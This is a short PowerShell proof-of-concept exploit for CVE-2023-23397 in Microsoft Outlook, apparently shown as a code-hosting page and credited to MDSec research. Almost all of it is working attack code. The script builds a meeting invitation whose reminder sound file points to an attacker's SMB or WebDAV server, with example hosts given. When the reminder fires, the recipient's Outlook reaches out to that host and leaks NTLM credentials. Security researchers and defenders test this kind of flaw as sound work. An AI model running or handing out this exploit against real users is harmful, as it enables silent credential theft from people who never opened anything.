/
CVE-2023-23397.ps1
32 lines (27 loc) · 1.46 KB
/
CVE-2023-23397.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
# PoC script for CVE-2023-23397, ported to PowerShell
# Credits go to Dominic Chell at MDSec
# See: https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/
$ol = New-Object -ComObject Outlook.Application
$meeting = $ol.CreateItem('olAppointmentItem')
$meeting.Subject = 'Time for a malicious meeting'
$meeting.Body = 'Simple CVE-2023-23397 test script'
$meeting.Location = 'Virtual'
$meeting.ReminderSet = $True
$meeting.Importance = 1
$meeting.MeetingStatus = [Microsoft.Office.Interop.Outlook.OlMeetingStatus]::olMeeting
$meeting.Recipients.Add('user@domain.com') # Set 'to' email address here
# Creates a meeting 16 mins in the future with a reminder 15mins before - should trigger the request 1minute after running
$meeting.ReminderMinutesBeforeStart = 15
$meeting.Start = [datetime]::Now.AddMinutes(16)
$meeting.Duration = 30
$meeting.ReminderPlaySound = $True
$meeting.ReminderOverrideDefault = $True
# This is the property that causes the vulnerability -
# Outlook will attempt to load the sound file from a remote
# server (if specified in the UNC path)
$meeting.ReminderSoundFile = "\\<UNC PATH>" # Change to your SMB server
# This can also be a WebDAV request (see https://www.n00py.io/2019/06/understanding-unc-paths-smb-and-webdav/) either via HTTP or HTTPS:
# $meeting.ReminderSoundFile = "\\foobar.com@80\soundfile.wav"
# $meeting.ReminderSoundFile = "\\foobar.com@SSL@443\soundfile.wav"
$meeting.Save()
$meeting.Send()